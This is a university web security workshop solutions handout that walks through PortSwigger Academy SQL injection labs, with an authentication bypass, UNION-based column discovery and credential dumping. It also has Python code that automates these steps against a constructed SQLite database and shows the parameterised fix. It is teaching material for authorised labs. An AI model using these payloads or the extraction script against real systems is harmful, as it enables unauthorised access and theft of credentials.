Workshop Week 4 - solutions PDF

Title Workshop Week 4 - solutions
Course Web security
Institution University of Melbourne


School of Computing and Information Systems
COMP90074: Web Security
Workshop Week 4

1. Introduction
For the purpose of this workshop, we will be learning from challenges within PortSwigger Academy. PortSwigger Academy provides a range of simple to difficult challenges. Today, we will be exploiting SQL injection challenges. We will be exploiting all these issues with Burp Suite.

2. PortSwigger Academy
Register for a PortSwigger Academy account at the URL below (and log in afterwards): https://portswigger.net/users
Note: Do not share your credentials with anyone. PortSwigger Academy creates a separate instance per user, per challenge, so do not share the domains you have been allocated either.

3. SQL Injection to Bypass Authentication
Attempt to bypass the authentication at: https://portswigger.net/web-security/sql-injection/lab-login-bypass

4. Authentication Bypass: Solution
Follow the following steps:
1. Access the lab
2. Click ‘Account login’
3. Enter the following as the username: administrator'--
4. Enter asdf as the password
5. Observe that we have authenticated into the application as the administrator user
The single quote closes the username string literal and -- starts a SQL comment, so the rest of the query, including the password check, is never evaluated; any password value works.
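To see exactly why administrator'-- works, here is an added example (not part of the workshop handout or of the lab's own code) that reproduces the vulnerable login against a constructed in-memory SQLite users table, next to the parameterised version that the same input does not bypass. The table contents, the made-up credentials and the function names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the lab's users table.
    The credentials are invented for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'h4rdT0gu3ss');
        INSERT INTO users VALUES ('wiener', 'peter');
    """)
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, the way the lab's login does.
    A quote in the username closes the literal and '--' comments out the rest
    of the statement, so the password comparison is never evaluated.
    Returns the authenticated username, or None on failure."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same lookup with bound parameters: the driver sends the values
    separately from the SQL text, so the quote and the comment marker are
    just characters in a username that does not exist."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The handout's payload against the vulnerable query: password is irrelevant.
    print("vulnerable:", login_vulnerable(db, "administrator'--", "asdf"))
    # The same payload against the parameterised query: no such user.
    print("safe:      ", login_safe(db, "administrator'--", "asdf"))
```

The effective statement the vulnerable function runs is SELECT username FROM users WHERE username = 'administrator'-- ' AND password = 'asdf', which is why step 4 of the solution can use any password. Bound parameters are the fix, not input filtering.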

5. SQL Injection to Add Your Own Item
Challenge can be found at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
For this challenge, we are going to use a SQL injection to add our own item into the shop (using UNION SELECT). The final output should look similar to the image below:

6. SQL Injection to Add Your Own Item: Solution
Follow the following steps:
1. Access the lab
2. Click on a category
3. Attempt to find the number of columns using: https://.web-security-academy.net/filter?category=Lifestyle%27+union+select+null--
4. You will get a server error. The error is caused by a mismatch between the number of columns in the injected SELECT and the number returned by the original query. Increase the number of NULLs one at a time until you no longer get an error; here the query returns three columns, so the final payload supplies three values, with the string placed in a column that accepts text: https://.web-security-academy.net/filter?category=Lifestyle%27+union+select+1,%27hacker%27,133700--
5. Observe that the injected row appears in the product listing as your own item

7. SQL Injection to Retrieve Data From Other Tables
Retrieve all usernames and passwords from the users table and log in as the administrator at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables

8. SQL Injection to Retrieve Data From Other Tables: Solution
Follow the following steps:
1. Access the lab
2. Click on a category
3. Attempt to find the number of columns using the skills you learnt in the previous challenge
4. Observe that adding this payload to the end of the URL works, signifying two columns in the original query: %27 UNION SELECT NULL,NULL--
5. Determine which columns can contain text by replacing each NULL in turn with a string
6. Observe that both columns contain text, with the following payload appearing on the page: %27 UNION SELECT %27abc%27, %27def%27--
7. Next use the following payload to leak the target columns from the target table: %27 UNION SELECT username, password FROM users--
8. Observe that the credentials have been leaked and are displayed on the page
9. Grab the administrator credentials and log in

9. SQL Injection to Retrieve Multiple Values in a Single Column
Retrieve all usernames and passwords from the users table and log in as the administrator at: https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column

10. SQL Injection to Retrieve Multiple Values in a Single Column: Solution
Follow the following steps:
1. Access the lab
2. Click on a category
3. Attempt to find the number of columns using the skills you learnt in the previous challenges
4. Observe that adding this payload to the end of the URL works, signifying two columns in the original query: %27 UNION SELECT NULL,NULL--
5. Determine which columns can contain text by replacing each NULL in turn with a string
6. Observe that only the second column contains text, with the following payload appearing on the page: %27 UNION SELECT NULL, %27def%27--
7. Next use the following payload to leak the target columns in a single column from the target table: %27 UNION SELECT NULL,CONCAT(username, %27 %27, password) FROM users--
8. Observe that the credentials have been leaked and are displayed on the page
9. Grab the administrator credentials and log in
Note that CONCAT() with more than two arguments is not available on every backend (Oracle's CONCAT takes exactly two); the standard || operator, as in username || ' ' || password, achieves the same result there.
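The labs in sections 6, 8 and 10 are the same UNION attack carried out by hand: count the columns, find which ones accept text, then route the target columns through them. The added example below (not from the handout or from PortSwigger) automates that sequence against a constructed in-memory SQLite shop database. It generalises slightly beyond the handout: the target query is given three columns as in section 6, the code discovers that count instead of assuming it, and it then performs both the two-column extraction of section 8 and the single-column concatenation of section 10. The table contents, the invented credentials and the function names are assumptions for the example; || is used in place of the handout's CONCAT() because both SQLite and PostgreSQL accept it.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory shop database standing in for the
    lab's backend. Products and credentials are invented for this example."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES ('Folding chair', 'Folds flat for storage', 1999, 'Lifestyle');
        INSERT INTO products VALUES ('Giant pillow', 'Very soft', 2500, 'Lifestyle');
        INSERT INTO products VALUES ('Robot toy', 'Beeps', 4000, 'Toys');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'h4rdT0gu3ss');
        INSERT INTO users VALUES ('wiener', 'peter');
        INSERT INTO users VALUES ('carlos', 'montoya');
    """)
    return db


def filter_products(db, category):
    """Deliberately vulnerable: the category value is pasted into the SQL text,
    mirroring the lab's /filter?category= endpoint. Do not write code like this."""
    sql = f"SELECT name, description, price FROM products WHERE category = '{category}'"
    return db.execute(sql).fetchall()


def count_columns(db, max_cols=10):
    """Step 1 of a UNION attack: append ' UNION SELECT NULL,...--' with one more
    NULL each round until the backend stops raising a column-count mismatch."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            filter_products(db, f"Lifestyle' UNION SELECT {nulls}--")
            return n
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
    raise RuntimeError("could not determine the column count")


def text_columns(db, ncols, marker="abc"):
    """Step 2: replace each NULL in turn with a string and record the positions
    where the marker comes back in the results. SQLite is dynamically typed, so
    every position accepts text here; a strictly typed backend such as
    PostgreSQL raises an error for probes that land in non-text columns."""
    found = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        try:
            rows = filter_products(db, f"Lifestyle' UNION SELECT {','.join(cols)}--")
        except sqlite3.OperationalError:
            continue
        if any(row[i] == marker for row in rows):
            found.append(i)
    return found


def dump_users(db, ncols, text_cols):
    """Step 3: pull username and password from the users table through the
    usable columns. With two text columns they go in separately (section 8);
    with only one they are concatenated into it (section 10). The handout uses
    CONCAT(); '||' is the standard operator that SQLite and PostgreSQL accept."""
    cols = ["NULL"] * ncols
    if len(text_cols) >= 2:
        cols[text_cols[0]] = "username"
        cols[text_cols[1]] = "password"
    else:
        cols[text_cols[0]] = "username || ' ' || password"
    rows = filter_products(db, f"Lifestyle' UNION SELECT {','.join(cols)} FROM users--")
    # The legitimate product rows come back too; keep only the injected ones.
    baseline = set(filter_products(db, "Lifestyle"))
    return [row for row in rows if row not in baseline]


if __name__ == "__main__":
    db = make_db()
    n = count_columns(db)
    usable = text_columns(db, n)
    print("columns:", n, "text columns:", usable)
    print("two-column dump:   ", dump_users(db, n, usable))
    print("single-column dump:", dump_users(db, n, [1]))
```

Passing [1] as the usable columns forces the single-column path, which is the situation in section 10 where only the second column displays text. In Burp the same three steps are driven through Repeater, with the server error in step 1 and the missing marker in step 2 playing the role of the caught exceptions here.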

11. Further reading

For further reading, and to excel at SQL injection attacks, complete the SQL injection labs at https://portswigger.net/web-security/all-labs. Note that these labs will be quite difficult but will improve your technical skills very quickly.
